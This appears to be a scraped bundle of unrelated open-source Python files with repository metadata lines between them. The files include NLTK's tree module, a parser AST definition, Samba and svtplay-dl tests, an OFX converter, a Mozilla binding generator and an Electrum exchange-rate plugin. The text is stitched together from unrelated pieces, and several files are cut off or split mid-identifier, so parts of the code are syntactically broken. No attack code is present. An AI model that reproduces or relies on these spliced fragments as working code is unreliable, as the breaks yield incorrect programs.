:obj:`datetime.datetime` | :obj:`datetime.time`): Time in or at which the job should run. This parameter will be interpreted depending on its type. * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the job should run. * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the job should run. * :obj:`datetime.datetime` will be interpreted as a specific date and time at which the job should run. * :obj:`datetime.time` will be interpreted as a specific time of day at which the job should run. This could be either today or, if the time has already passed, tomorrow. context (:obj:`object`, optional): Additional data needed for the callback function. Can be accessed through ``job.context`` in the callback. Defaults to ``None``. name (:obj:`str`, optional): The name of the new job. Defaults to ``callback.__name__``. Returns: :class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job queue. """ job = Job(callback, repeat=False, context=context, name=name, job_queue=self) self._put(job, next_t=when) return job def run_repeating(self, callback, interval, first=None, context=None, name=None): """Creates a new ``Job`` that runs once and adds it to the queue. Args: callback (:obj:`callable`): The callback function that should be executed by the new job. It should take ``bot, job`` as parameters, where ``job`` is the :class:`telegram.ext.Job` instance. It can be used to access it's ``Job.context`` or change it to a repeating job. interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`): The interval in which the job will run. If it is an :obj:`int` or a :obj:`float`, it will be interpreted as seconds. first (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional): Time in or at which the job should run. This parameter will be interpreted depending on its type. * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the job should run. * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the job should run. * :obj:`
nelango/ViralityAnalysis
model/lib/nltk/tree.py
Python
mit
64,375
0.003216
# -*- coding: utf-8 -*- # Na
tural Language Toolkit: Text Trees # # Copyright (C) 2001-2015 NLTK Project # Author: Edward Loper <edloper@gmail.com> # Steven Bird <stevenbird1@gmail.com> # Peter Ljunglöf <peter.ljunglof@gu.se> # Nathan Bodenstab <bodenstab@cslu.ogi.edu> (tree
transforms) # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Class for representing hierarchical language structures, such as syntax trees and morphological trees. """ from __future__ import print_function, unicode_literals # TODO: add LabelledTree (can be used for dependency trees) import re from nltk.grammar import Production, Nonterminal from nltk.probability import ProbabilisticMixIn from nltk.util import slice_bounds from nltk.compat import string_types, python_2_unicode_compatible, unicode_repr from nltk.internals import raise_unorderable_types ###################################################################### ## Trees ###################################################################### @python_2_unicode_compatible class Tree(list): """ A Tree represents a hierarchical grouping of leaves and subtrees. For example, each constituent in a syntax tree is represented by a single Tree. A tree's children are encoded as a list of leaves and subtrees, where a leaf is a basic (non-tree) value; and a subtree is a nested Tree. >>> from nltk.tree import Tree >>> print(Tree(1, [2, Tree(3, [4]), 5])) (1 2 (3 4) 5) >>> vp = Tree('VP', [Tree('V', ['saw']), ... Tree('NP', ['him'])]) >>> s = Tree('S', [Tree('NP', ['I']), vp]) >>> print(s) (S (NP I) (VP (V saw) (NP him))) >>> print(s[1]) (VP (V saw) (NP him)) >>> print(s[1,1]) (NP him) >>> t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))") >>> s == t True >>> t[1][1].set_label('X') >>> t[1][1].label() 'X' >>> print(t) (S (NP I) (VP (V saw) (X him))) >>> t[0], t[1,1] = t[1,1], t[0] >>> print(t) (S (X him) (VP (V saw) (NP I))) The length of a tree is the number of children it has. >>> len(t) 2 The set_label() and label() methods allow individual constituents to be labeled. For example, syntax trees use this label to specify phrase tags, such as "NP" and "VP". Several Tree methods use "tree positions" to specify children or descendants of a tree. Tree positions are defined as follows: - The tree position *i* specifies a Tree's *i*\ th child. - The tree position ``()`` specifies the Tree itself. - If *p* is the tree position of descendant *d*, then *p+i* specifies the *i*\ th child of *d*. I.e., every tree position is either a single index *i*, specifying ``tree[i]``; or a sequence *i1, i2, ..., iN*, specifying ``tree[i1][i2]...[iN]``. Construct a new tree. This constructor can be called in one of two ways: - ``Tree(label, children)`` constructs a new tree with the specified label and list of children. - ``Tree.fromstring(s)`` constructs a new tree by parsing the string ``s``. """ def __init__(self, node, children=None): if children is None: raise TypeError("%s: Expected a node value and child list " % type(self).__name__) elif isinstance(children, string_types): raise TypeError("%s() argument 2 should be a list, not a " "string" % type(self).__name__) else: list.__init__(self, children) self._label = node #//////////////////////////////////////////////////////////// # Comparison operators #//////////////////////////////////////////////////////////// def __eq__(self, other): return (self.__class__ is other.__class__ and (self._label, list(self)) == (other._label, list(other))) def __lt__(self, other): if not isinstance(other, Tree): # raise_unorderable_types("<", self, other) # Sometimes children can be pure strings, # so we need to be able to compare with non-trees: return self.__class__.__name__ < other.__class__.__name__ elif self.__class__ is other.__class__: return (self._label, list(self)) < (other._label, list(other)) else: return self.__class__.__name__ < other.__class__.__name__ # @total_ordering doesn't work here, since the class inherits from a builtin class __ne__ = lambda self, other: not self == other __gt__ = lambda self, other: not (self < other or self == other) __le__ = lambda self, other: self < other or self == other __ge__ = lambda self, other: not self < other #//////////////////////////////////////////////////////////// # Disabled list operations #//////////////////////////////////////////////////////////// def __mul__(self, v): raise TypeError('Tree does not support multiplication') def __rmul__(self, v): raise TypeError('Tree does not support multiplication') def __add__(self, v): raise TypeError('Tree does not support addition') def __radd__(self, v): raise TypeError('Tree does not support addition') #//////////////////////////////////////////////////////////// # Indexing (with support for tree positions) #//////////////////////////////////////////////////////////// def __getitem__(self, index): if isinstance(index, (int, slice)): return list.__getitem__(self, index) elif isinstance(index, (list, tuple)): if len(index) == 0: return self elif len(index) == 1: return self[index[0]] else: return self[index[0]][index[1:]] else: raise TypeError("%s indices must be integers, not %s" % (type(self).__name__, type(index).__name__)) def __setitem__(self, index, value): if isinstance(index, (int, slice)): return list.__setitem__(self, index, value) elif isinstance(index, (list, tuple)): if len(index) == 0: raise IndexError('The tree position () may not be ' 'assigned to.') elif len(index) == 1: self[index[0]] = value else: self[index[0]][index[1:]] = value else: raise TypeError("%s indices must be integers, not %s" % (type(self).__name__, type(index).__name__)) def __delitem__(self, index): if isinstance(index, (int, slice)): return list.__delitem__(self, index) elif isinstance(index, (list, tuple)): if len(index) == 0: raise IndexError('The tree position () may not be deleted.') elif len(index) == 1: del self[index[0]] else: del self[index[0]][index[1:]] else: raise TypeError("%s indices must be integers, not %s" % (type(self).__name__, type(index).__name__)) #//////////////////////////////////////////////////////////// # Basic tree operations #//////////////////////////////////////////////////////////// def _get_node(self): """Outdated method to access the node value; use the label() method instead.""" raise NotImplementedError("Use label() to access a node label.") def _set_node(self, value): """Outdated method to set the node value; use the set_label() method instead.""" raise NotImplementedError("Use set_label() method to set a node label.") node = property(_get_node, _set_node) def label(self): """ Return the node label of the tree. >>> t = Tree.fromstring('(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))') >>> t.label() 'S' :return: the node label (typically a string)
learningequality/video-vectorization
video_processing/pipelines/simple_encode_decode.py
Python
mit
902
0.003326
# Copyright 2019 Google LLC. """Pipeline to decode and reencode a video using OpenCV.""" from absl import app from absl import flags from video_processing import processor_runner from video_processing.processors import opencv_video_decoder from video_processing.processors import opencv_video_encoder flags.DEFINE_string('input_video_file', '', 'Input file.') flags.DEFINE_string('output_video_file', '', 'Output file.') FLAGS = flags.FLAGS def pipeline(input_video_file, output_video_file): return [ opencv_video_decoder.OpenCVVideoD
ecoderProcessor( {'input_video_file': input_video_file}), opencv_video_encoder.OpenCVVi
deoEncoderProcessor( {'output_video_file': output_video_file}) ] def main(unused_argv): processor_runner.run_processor_chain( pipeline(FLAGS.input_video_file, FLAGS.output_video_file)) if __name__ == '__main__': app.run(main)
andresriancho/moto
tests/test_ec2/test_placement_groups.py
Python
apache-2.0
109
0
import boto
import sure # noqa from moto import mock_ec2 @mock_ec2 def test_placement_groups
(): pass
google/grumpy
third_party/pythonparser/ast.py
Python
apache-2.0
26,727
0.005131
# encoding: utf-8 """ The :mod:`ast` module contains the classes comprising the Python abstract syntax tree. All attributes ending with ``loc`` contain instances of :class:`.source.Range` or None. All attributes ending with ``_locs`` contain lists of instances of :class:`.source.Range` or []. The attribute ``loc``, present in every class except those inheriting :class:`boolop`, has a special meaning: it encompasses the entire AST node, so that it is possible to cut the range contained inside ``loc`` of a parsetree fragment and paste it somewhere else without altering said parsetree fragment that. The AST format for all supported versions is generally normalized to be a superset of the native :mod:`..ast` module of the latest supported Python version. In particular this affects: * :class:`With`: on 2.6-2.7 it uses the 3.0 format. * :class:`TryExcept` and :class:`TryFinally`: on 2.6-2.7 they're replaced with :class:`Try` from 3.0. * :class:`arguments`: on 2.6-3.1 it uses the 3.2 format, with dedicated :class:`arg` in ``vararg`` and ``kwarg`` slots. """ from __future__ import absolute_import, division, print_function, unicode_literals # Location mixins class commonloc(object): """ A mixin common for all nodes. :cvar _locs: (tuple of strings) names of all attributes with location values :ivar loc: range encompassing all locations defined for this node or its children """ _locs = ("loc",) def _reprfields(self): return self._fields + self._locs def __repr__(self): def value(name): try: loc = self.__dict__[name] if isinstance(loc, list): return "[%s]" % (", ".join(map(repr, loc))) else: return repr(loc) except: return "(!!!MISSING!!!)" fields = ", ".join(map(lambda name: "%s=%s" % (name, value(name)), self._reprfields())) return "%s(%s)" % (self.__class__.__name__, fields) @property def lineno(self): return self.loc.line() class keywordloc(commonloc): """ A mixin common for all keyword statements, e.g. ``pass`` and ``yield expr``. :ivar keyword_loc: location of the keyword, e.g. ``yield``. """ _locs = commonloc._locs + ("keyword_loc",) class beginendloc(commonloc): """ A mixin common for nodes with a opening and closing delimiters, e.g. tuples and lists. :ivar begin_loc: location of the opening delimiter, e.g. ``(``. :ivar end_loc: location of the closing delimiter, e.g. ``)``. """ _locs = commonloc._locs + ("begin_loc", "end_loc") # AST nodes class AST(object): """ An ancestor of all nodes. :cvar _fields: (tuple of strings) names of all attributes with semantic values """ _fields = () def __init__(self, **fields): for field in fields: setattr(self, field, fields[field]) class alias(AST, commonloc): """ An import alias, e.g. ``x as y``. :ivar name: (string) value to import :ivar asname: (string) name to add to the environment :ivar name_loc: location of name :ivar as_loc: location of ``as`` :ivar asname_loc: location of asname """ _fields = ("name", "asname") _locs = commonloc._locs + ("name_loc", "as_loc", "asname_loc") class arg(AST, commonloc): """ A formal argument, e.g. in ``def f(x)`` or ``def f(x: T)``. :ivar arg: (string) argument name :ivar annotation: (:class:`AST`) type annotation, if any; **emitted since 3.0** :ivar arg_loc: location of argument name :ivar colon_loc: location of ``:``, if any; **emitted since 3.0** """ _fields = ("arg", "annotation") _locs = commonloc._locs + ("arg_loc", "colon_loc") class arguments(AST, beginendloc): """ Function definition arguments, e.g. in ``def f(x, y=1, *z, **t)``. :ivar args: (list of :class:`arg`) regular formal arguments :ivar defaults: (list of :class:`AST`) values of default arguments :ivar vararg: (:class:`arg`) splat formal argument (if any), e.g. in ``*x`` :ivar kwonlyargs: (list of :class:`arg`) keyword-only (post-\*) formal arguments; **emitted since 3.0** :ivar kw_defaults: (list of :class:`AST`) values of default keyword-only arguments; **emitted since 3.0** :ivar kwarg: (:class:`arg`) keyword splat formal argument (if any), e.g. in ``**x`` :ivar star_loc: location of ``*``, if any :ivar dstar_loc: location of ``**``, if any :ivar equals_locs: locations of ``=`` :ivar kw_equals_locs: locations of ``=`` of default keyword-only arguments; **emitted since 3.0** """ _fields = ("args", "vararg", "kwonlyargs", "kwarg", "defaults", "kw_defaults") _locs = beginendloc._locs + ("star_loc", "dstar_loc", "equals_locs", "kw_equals_locs") class boolop(AST, commonloc): """ Base class for binary boolean operators. This class is unlike others in that it does not have the ``loc`` field. It serves only as an indicator of operation and corresponds to no source itself; locations are recorded in :class:`BoolOp`. """ _locs = () class And(boolop): """The ``and`` operator.""" class Or(boolop): """The ``or`` operator.""" class cmpop(AST, commonloc): """Base class for comparison operators.""" class Eq(cmpop): """The ``==`` operator.""" class Gt(cmpop): """The ``>`` operator.""" class GtE(cmpop): """The ``>=`` operator.""" class In(cmpop): """The ``in`` operator.""" class Is(cmpop): """The ``is``
operator.""" class IsNot(cmpop): """The ``is not`` operator.""" class Lt(cmpop): """The ``<`` operator.""" class LtE(cmpop): """The ``<=`` operator.""" class NotEq(cmpop): """The ``!=`` (or deprecated ``<>``) operator.""" class NotIn(cmpop): """The ``not in`` operator.""" class comprehension(AST, commonloc): """ A
single ``for`` list comprehension clause. :ivar target: (assignable :class:`AST`) the variable(s) bound in comprehension body :ivar iter: (:class:`AST`) the expression being iterated :ivar ifs: (list of :class:`AST`) the ``if`` clauses :ivar for_loc: location of the ``for`` keyword :ivar in_loc: location of the ``in`` keyword :ivar if_locs: locations of ``if`` keywords """ _fields = ("target", "iter", "ifs") _locs = commonloc._locs + ("for_loc", "in_loc", "if_locs") class excepthandler(AST, commonloc): """Base class for the exception handler.""" class ExceptHandler(excepthandler): """ An exception handler, e.g. ``except x as y:· z``. :ivar type: (:class:`AST`) type of handled exception, if any :ivar name: (assignable :class:`AST` **until 3.0**, string **since 3.0**) variable bound to exception, if any :ivar body: (list of :class:`AST`) code to execute when exception is caught :ivar except_loc: location of ``except`` :ivar as_loc: location of ``as``, if any :ivar name_loc: location of variable name :ivar colon_loc: location of ``:`` """ _fields = ("type", "name", "body") _locs = excepthandler._locs + ("except_loc", "as_loc", "name_loc", "colon_loc") class expr(AST, commonloc): """Base class for expression nodes.""" class Attribute(expr): """ An attribute access, e.g. ``x.y``. :ivar value: (:class:`AST`) left-hand side :ivar attr: (string) attribute name """ _fields = ("value", "attr", "ctx") _locs = expr._locs + ("dot_loc", "attr_loc") class BinOp(expr): """ A binary operation, e.g. ``x + y``. :ivar left: (:class:`AST`) left-hand side :ivar op: (:class:`operator`) operator :ivar right: (:class:`AST`) right-hand side """ _fields = ("left", "op", "right") class BoolOp(expr): """ A boolean operation, e.g. ``x and y``. :ivar op: (:class:`boolop`) operator :ivar values: (list of :class:`AST`) operands :ivar op_locs: locations of operators """ _fields = ("op", "values") _locs = expr._locs + ("op_locs",) class Call(expr, beginendloc): """ A function call, e.g. ``f
rkycia/GenEx
test.py
Python
gpl-3.0
4,308
0.036444
#! /usr/bin/env python # @brief Script to run apropriate tests. import os import distutils.core from shutil import rmtree, copyfile """Avaiable tests dictionary in the format no_of_test : name_of_test""" tests = {0:"default Generator.dat with lot of comments and explanations", 1:"RHIC pt_pi, eta_pi; tecm = 200GeV; Lambda2=1", 2:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1", 3:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6", 4:"RHIC pt_pi, eta_pi; tecm = 500GeV; Lambda2=1", 5:"RHIC pt_pi,
eta_pi, t1, t2; tecm = 500GeV; Lambda2=1", 6:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1.6", 7:"LHC pt_pi, eta_pi; tecm =
7TeV, 1st; Lambda2=1.2", 8:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.6", 9:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.2", 10:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.6", 11:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.2", 12:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.6", 13:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.2", 14:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.6", 15:"2to5; y_pi, tecm = 200GeV", 16:"CPS, N=5, y_pi, tecm = 200GeV", 17:"2to5; y_pi, t, tecm = 200GeV", 18:"CPS, N=5, y_pi, t, tecm = 200GeV", 19:"CPS, N=5, Exploration Cuts, y_pi, t, tecm = 200GeV", 20:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; LS method of Phase Space generation", 21:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; 2toN (N=4) method of Phase Space generation", 22:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 1000 = nSampl, y in [-8;8]", 23:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-8;8]", 24:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 10000, y in [-8;8]", 25:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-2;2]", 26:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000 = nSampl, y in [-2;2]" } def prepareTest( number, testDir = './Tests', testName = 'test', configFile = 'Generator.dat' ): """Prepare configuration file by picking one of the test file from testDir @param testDir dir containing tests @param testName basename of test @param configFile configuration file for generator """ #save old config file copyfile(configFile, "OLD"+configFile) #copy configuration files fromDirectory = testDir + '/' + testName + str(number) copyfile(fromDirectory, configFile) return testDir def rmDir( directory = "./" ): """Remove directory and all its content @param directory base directory for project """ rmtree( directory ) def runMake( option, runDir = './'): """Run make with option in given directory @param option option for make @param runDir directory in which make will be executed """ os.system( 'make -C ' + runDir + ' ' + option) def showTests( testDict ): """Show tests in dictionary @param testDict dictionary with tests in the format no_of_test : name_of_test """ print("#########################") print("AVAIBLE TESTS:") print("#########################") for key in testDict: print( str(key) + ' -- '+ str(testDict[key]) ) print("#########################") def pickTest( testDict ): """Allows user to pick option from the keys of dictionary and returns it @param testDict dictionary with tests in the format no_of_test : name_of_test """ finish = False while not finish: showTests(testDict) input_var = input("Enter option: ") print ("you entered " + str(input_var)) if input_var in testDict.keys(): finish = True return input_var def main(): """Simple test suit for GenEx. It copy Core GenEx files and selected configuration files to one test directory and then run it and remove test directory""" testNo = pickTest( tests ) print("Preparing generator...") prepareTest(testNo) print("...DONE") print("Start test...") runMake('run') print("...DONE") print("Cleaning dir...") runMake('clean') print("...DONE") if __name__ == "__main__": main()
olof/svtplay-dl
lib/svtplay_dl/service/tests/oppetarkiv.py
Python
mit
591
0.001692
#!/usr/bin/python
# ex:ts=4:sw=4:
sts=4:et # -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*- # The unittest framwork doesn't play nice with pylint: # pylint: disable-msg=C0103 from __future__ import absolute_import import unittest from svtplay_dl.service.oppetarkiv import OppetArkiv from svtplay_dl.service.tests import HandlesURLsTestMixin class handlesTest(unittest.TestCase, HandlesURLsTestMixin): service = OppetArkiv urls = {"ok": ["http://www.oppetarkiv.se/video/1129844/jacobs-stege-avsnitt-1-av-1"], "bad": ["http://www.svtplay.se/video/1090393/del-9"]}
wimberosa/samba
source4/scripting/python/samba/tests/core.py
Python
gpl-3.0
2,175
0.004598
#!/usr/bin/env python # Unix SMB/CIFS implementation. # Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007-2008 # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # """Samba Python tests.""" import ldb import os import samba from samba.tests import TestCase, TestCaseInTempDir class SubstituteVarTestCase(TestCase): def test_empty(self): self.assertEquals("", samba.substitute_var("", {})) def test_nothing(self): self.assertEquals("foo bar", samba.substitute_var("foo bar", {"bar": "bla"})) def test_replace(self): self.assertEquals("foo bla", samba.substitute_var("foo ${bar}", {"bar": "bla"})) def test_broken(self): self.assertEquals("foo ${bdkjfhsdkfh sdkfh ", samba.substitute_var("foo ${bdkjfhsdkfh sdkfh ", {"bar": "bla"})) def test_unknown_var(self): self.assertEquals("foo ${bla} gsff", samba.substitute_var("foo ${bla} gsff", {"bar": "bla"})) def test_check_all_substituted(self): samba.check_all_substituted("nothing to see here") self.assertRaises(Exception, samba.check_all_substituted, "Not subsituted: ${FOOBAR}") class LdbExtensionTests(TestCaseInTempDir): def test_searchone(self): path = self.tempdir + "/searchone.ldb" l = samba.Ldb(path) try: l.add({"dn": "foo=dc", "bar": "bla"}) sel
f.assertEquals("bla", l.searchone(basedn=ldb.Dn(l, "foo=dc"), attribute="bar")) finally: del l
os.unlink(path)
henriquebastos/fixofx
fixofx/ofx/document.py
Python
apache-2.0
3,289
0.001216
#coding: utf-8 # Copyright 2005-2010 Wesabe, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ofx.document - abstract OFX document. # import xml.sax.saxutils as sax class Document: def as_xml(self, original_format=None, date_format=None): """Formats this document as an OFX 2.0 XML document.""" xml = "" # NOTE: Encoding in OFX, particularly in OFX 1.02, # is kind of a mess. The OFX 1.02 spec talks about "UNICODE" # as a supported encoding, which the OFX 2.0 spec has # back-rationalized to "UTF-8". The "US-ASCII" encoding is # given as "USASCII". Yet the 1.02 spec acknowledges that # not everyone speaks English nor uses UNICODE, so they let # you throw any old encoding in there you'd like. I'm going # with the idea that if the most common encodings are named # in an OFX file, they should be translated to "real" XML # encodings, and if no encoding is given, UTF-8 (which is a # superset of US-ASCII) should be assumed; but if a named # encoding other than USASCII or 'UNICODE' is given, that # should be preserved. I'm also adding a get_encoding() # method so that we can start to survey what encodings # we're actually seeing, and use that to maybe be smarter # about this in the future. #forcing encoding to utf-8 encoding = "UTF-8" xml += """<?xml version="1.0" encoding="%s"?>\n""" % encoding xml += """<?OFX OFXHEADER="200" VERSION="200" """ + \ """SECURITY="%s" OLDFILEUID="%s" NEWFILEUID="%s"?>\n""" % \ (self.parse_dict["header"]["SECURITY"], self.parse_dict["header"]["OLDFILEUID"], self.parse_dict["header"]["
NEWFILEUID"]) if original_format is not None: xml += """
<!-- Converted from: %s -->\n""" % original_format if date_format is not None: xml += """<!-- Date format was: %s -->\n""" % date_format taglist = self.parse_dict["body"]["OFX"][0].asList() xml += self._format_xml(taglist) return xml def _format_xml(self, mylist, indent=0): xml = "" indentstring = " " * indent tag = mylist.pop(0) if len(mylist) > 0 and isinstance(mylist[0], list): xml += "%s<%s>\n" % (indentstring, tag) for value in mylist: xml += self._format_xml(value, indent=indent + 2) xml += "%s</%s>\n" % (indentstring, tag) elif len(mylist) > 0: # Unescape then reescape so we don't wind up with '&amp;lt;', oy. value = sax.escape(sax.unescape(mylist[0])) xml += "%s<%s>%s</%s>\n" % (indentstring, tag, value, tag) return xml
sergecodd/FireFox-OS
B2G/gecko/dom/bindings/BindingGen.py
Python
apache-2.0
2,361
0.003388
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. import os import cPickle import WebIDL from Configuration import * from Codegen import CGBindingRoot, replaceFileIfChanged # import Codegen in general, so we can set a variable on it import Codegen def generate_binding_header(config, outputprefix, webidlfile): """ |config| Is the configuration object. |outputprefix| is a prefix to use for the header guards and filename. """ filename = outputprefix + ".h" root = CGBindingRoot(config, outputprefix, webidlfile) if replaceFileIfChanged(filename, root.declare()): print "Generating binding header: %s" % (filename) def generate_binding_cpp(config, outputprefix, webidlfile): """ |config| Is the configuration object. |outputprefix| is a prefix to use for the header guards and filename. """ filename = outputprefix + ".cpp" root = CGBindingRoot(config, outputprefix, webidlfile) if replaceFileIfChanged(filename, root.define()): print "Generating binding implementation: %s" % (filename) def main(): # Parse arguments. from optparse import OptionParser usagestring = "usage: %prog [header|cpp] configFile outputPrefix webIDLFile" o = OptionParser(usage=usagestring) o.add_option("--verbose-errors", action='store_true', default=False, help="When an error happens, display the Python traceback.") (options, args) = o.parse_args() if len(args) != 4 or (args[0] != "header" and args[0] != "cpp"): o.error(usagestring) buildTarget = args[0] configFile = os.path.normpath(args[1]) outputPrefix = args[2] webIDLFile = os.path.normpath(args[3]) # Load the parsing results f = open('ParserResults.pkl', 'rb') parserData = cPickle.load(f) f.clo
se() # Create the configuration data. config = Configuration(configFile, parserData) # Generate the prototype classes. if buildTarget == "header": generate_binding_header(config, outputPrefix, webIDLFile); elif buildTarget == "cpp": generate_binding_cpp(config, outputPrefix, webIDLFile); else: assert False # not reached if __name__ == '__main__
': main()
marlengit/electrum198
plugins/exchange_rate.py
Python
gpl-3.0
18,608
0.00489
from PyQt4.QtGui import * from PyQt4.QtCore import * import datetime import decimal import httplib import json import threading import re from decimal import Decimal from electrum.plugins import BasePlugin from electrum.i18n import _ from electrum_gui.qt.util import * EXCHANGES = ["BitcoinAverage", "BitcoinVenezuela", "BitPay", "Blockchain", "BTCChina", "CaVirtEx", "Coinbase", "CoinDesk", "LocalBitcoins", "Winkdex"] class Exchanger(threading.Thread): def __init__(self, parent): threading.Thread.__init__(self) self.daemon = True self.parent = parent self.quote_currencies = None self.lock = threading.Lock() self.query_rates
= threading.Event() self.use_exchange = self.parent.config.get('use_exchange', "Blockchain") self.parent.exchanges = EXCHANGES self.parent.currencies = ["EUR","GBP","USD"] self.parent.win.emit(SIGNAL("refresh_exchanges_combo()")) self.parent.win.emit(SIGNAL("refresh_currencies_combo()")) self.is_running = False
def get_json(self, site, get_string): try: connection = httplib.HTTPSConnection(site) connection.request("GET", get_string) except Exception: raise resp = connection.getresponse() if resp.reason == httplib.responses[httplib.NOT_FOUND]: raise try: json_resp = json.loads(resp.read()) except Exception: raise return json_resp def exchange(self, btc_amount, quote_currency): with self.lock: if self.quote_currencies is None: return None quote_currencies = self.quote_currencies.copy() if quote_currency not in quote_currencies: return None if self.use_exchange == "CoinDesk": try: resp_rate = self.get_json('api.coindesk.com', "/v1/bpi/currentprice/" + str(quote_currency) + ".json") except Exception: return return btc_amount * decimal.Decimal(str(resp_rate["bpi"][str(quote_currency)]["rate_float"])) return btc_amount * decimal.Decimal(quote_currencies[quote_currency]) def stop(self): self.is_running = False def update_rate(self): self.use_exchange = self.parent.config.get('use_exchange', "Blockchain") update_rates = { "BitcoinAverage": self.update_ba, "BitcoinVenezuela": self.update_bv, "BitPay": self.update_bp, "Blockchain": self.update_bc, "BTCChina": self.update_CNY, "CaVirtEx": self.update_cv, "CoinDesk": self.update_cd, "Coinbase": self.update_cb, "LocalBitcoins": self.update_lb, "Winkdex": self.update_wd, } try: update_rates[self.use_exchange]() except KeyError: return def run(self): self.is_running = True while self.is_running: self.query_rates.clear() self.update_rate() self.query_rates.wait(150) def update_cd(self): try: resp_currencies = self.get_json('api.coindesk.com', "/v1/bpi/supported-currencies.json") except Exception: return quote_currencies = {} for cur in resp_currencies: quote_currencies[str(cur["currency"])] = 0.0 with self.lock: self.quote_currencies = quote_currencies self.parent.set_currencies(quote_currencies) def update_wd(self): try: winkresp = self.get_json('winkdex.com', "/static/data/0_600_288.json") ####could need nonce value in GET, no Docs available except Exception: return quote_currencies = {"USD": 0.0} ####get y of highest x in "prices" lenprices = len(winkresp["prices"]) usdprice = winkresp["prices"][lenprices-1]["y"] try: quote_currencies["USD"] = decimal.Decimal(usdprice) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_cv(self): try: jsonresp = self.get_json('www.cavirtex.com', "/api/CAD/ticker.json") except Exception: return quote_currencies = {"CAD": 0.0} cadprice = jsonresp["last"] try: quote_currencies["CAD"] = decimal.Decimal(cadprice) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_CNY(self): try: jsonresp = self.get_json('data.btcchina.com', "/data/ticker") except Exception: return quote_currencies = {"CNY": 0.0} cnyprice = jsonresp["ticker"]["last"] try: quote_currencies["CNY"] = decimal.Decimal(cnyprice) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_bp(self): try: jsonresp = self.get_json('bitpay.com', "/api/rates") except Exception: return quote_currencies = {} try: for r in jsonresp: quote_currencies[str(r["code"])] = decimal.Decimal(r["rate"]) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_cb(self): try: jsonresp = self.get_json('coinbase.com', "/api/v1/currencies/exchange_rates") except Exception: return quote_currencies = {} try: for r in jsonresp: if r[:7] == "btc_to_": quote_currencies[r[7:].upper()] = self._lookup_rate_cb(jsonresp, r) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_bc(self): try: jsonresp = self.get_json('blockchain.info', "/ticker") except Exception: return quote_currencies = {} try: for r in jsonresp: quote_currencies[r] = self._lookup_rate(jsonresp, r) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) # print "updating exchange rate", self.quote_currencies["USD"] def update_lb(self): try: jsonresp = self.get_json('localbitcoins.com', "/bitcoinaverage/ticker-all-currencies/") except Exception: return quote_currencies = {} try: for r in jsonresp: quote_currencies[r] = self._lookup_rate_lb(jsonresp, r) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_bv(self): try: jsonresp = self.get_json('api.bitcoinvenezuela.com', "/") except Exception: return quote_currencies = {} try: for r in jsonresp["BTC"]: quote_currencies[r] = Decimal(jsonresp["BTC"][r]) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_ba(self): try: jsonresp = self.get_json('api.bitcoinaverage.com', "/ticker/global/all") except Exception: return quote_currencies = {} try:
evilhero/mylar
lib/cherrypy/test/test_etags.py
Python
gpl-3.0
